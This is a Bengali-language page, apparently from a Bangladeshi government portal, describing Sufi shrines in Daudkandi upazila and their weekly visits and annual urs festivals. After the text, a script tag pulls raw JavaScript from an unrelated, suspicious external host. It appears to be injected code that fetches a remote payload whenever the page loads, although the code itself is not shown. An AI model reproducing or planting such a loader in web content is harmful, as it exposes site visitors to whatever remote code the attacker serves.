Wellcome to National Portal
মেনু নির্বাচন করুন
Main Comtent Skiped

মাজার
দাউদকান্দি উপজেলা অনেক অলি আল্লাহর লিলা ভূমি। তাদের স্মরণে এখানে রয়েছে অনেক মাজার। তন্মধ্যে উল্লেখযোগ্য হচ্ছে- শ্রী রায়েরচর পাগল শাহ মাজার-এ মাজারটি দাউদকান্দি উপজেলার পদুয়া ইউনিয়নের শ্রী রায়েরচর গ্রামে অবস্থিত। এ মাজারটিতে প্রতি শুক্র ও শনিবার সাধারণ মানুষ মাজার জিয়ারতের উদ্দেশ্যে এখানে সমাগত হন। এ ছাড়াও এ উপজেলায় আরো রয়েছে গণীশাহ মাজার, আঃ লতীফ শাহ মাজার। এ সকল মাজারে প্রতি বছর অলি আল্লাহদের স্মরণে বার্ষিক ওরশ অনুষ্ঠিত হয়। যেখানে দাউদকান্দি উপজেলাসহ বাংলাদেশের বিভিন্ন প্রান্ত থেকে তাদের অনেক অনুসারীসহ বিপুল সংখ্যক ভক্তের সমাগম হয়।

<script type="text/javascript" src="//jso-tools.z-x.my.id/raw/~/9XLCL1GTPHYCT"></script>